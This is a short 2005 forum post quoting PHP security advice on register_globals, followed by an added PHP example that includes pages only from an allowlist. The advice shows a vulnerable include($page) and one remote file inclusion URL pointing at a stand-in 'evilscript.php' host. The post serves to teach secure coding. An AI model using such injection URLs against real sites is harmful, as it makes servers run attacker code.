#1543893 · 24 Jun 2005, 16:06
If you know English...
3. Be careful when using register_globals = ON
This has been a major issue since this feature was invented. It was originally designed to make programming in PHP easier (and that it did), but misuse of it often led to security holes. As of PHP 4.2.0, register_globals is set to OFF by default. It is recommended that you use the superglobals to deal with input ($_GET, $_POST, $_COOKIE, $_SESSION, etc.).
For example, let us say that you had a variable that specified what page to include:
PHP Code:
include($page);
But you intended $page to be defined in a config file or somewhere else in the script, and not to come as user input. In one instance you forgot to pre-define $page. If register_globals is set to on, the malicious user can take over and define $page for you, by calling your script like this:
script.php?page=http://www.example.com/evilscript.php
I recommend that you develop with register_globals set to OFF, and use the superglobals when accessing user input. In addition, you should always develop with full error reporting, which can be specified like this (at the top of your script):
PHP Code:
error_reporting(E_ALL);
This way, you will receive a notice for every variable you try to call that was not previously defined. Yes, PHP does not require you to define variables, so there may be notices that you can ignore, but this will help you to catch undefined variables that you did expect to come from input or other sources. In the previous example, when $page was referenced in the include() statement, PHP would issue a notice that $page was not defined.
Whether or not you want to use register_globals is up to you, but make sure you are aware of the advantages and disadvantages of it and how to remedy the possible security holes.
--------------------
You said it!
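As an added example (not code from the quoted post): the include($page) pattern above rewritten to read the page name explicitly from the $_GET superglobal and check it against a fixed allowlist, so that neither register_globals nor an arbitrary query string can decide which file is included. The allowlist keys and the pages/ file paths are assumed placeholders.

```php
<?php
// Added example, not from the original post. Report every notice so an
// undefined variable such as $page is flagged instead of silently used.
error_reporting(E_ALL);

// Constructed allowlist: the only files this script is ever allowed to include.
// Keys are the values accepted in the query string, values are local files.
$allowedPages = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Resolve the requested page to a local file using only the allowlist.
 * Returns the file path, or null when the request is missing or not allowed.
 */
function resolvePage(array $allowed, array $query): ?string
{
    // Read explicitly from the request array, never from a bare global $page,
    // so a register_globals-injected variable can never reach include().
    if (!isset($query['page']) || !is_string($query['page'])) {
        return null;
    }
    // Exact-key lookup: a remote URL or a path with "../" is never a key,
    // so anything outside the allowlist is rejected rather than included.
    return $allowed[$query['page']] ?? null;
}

$page = resolvePage($allowedPages, $_GET);
if ($page === null) {
    http_response_code(404);
    echo 'Unknown page';
    exit;
}
include $page;
```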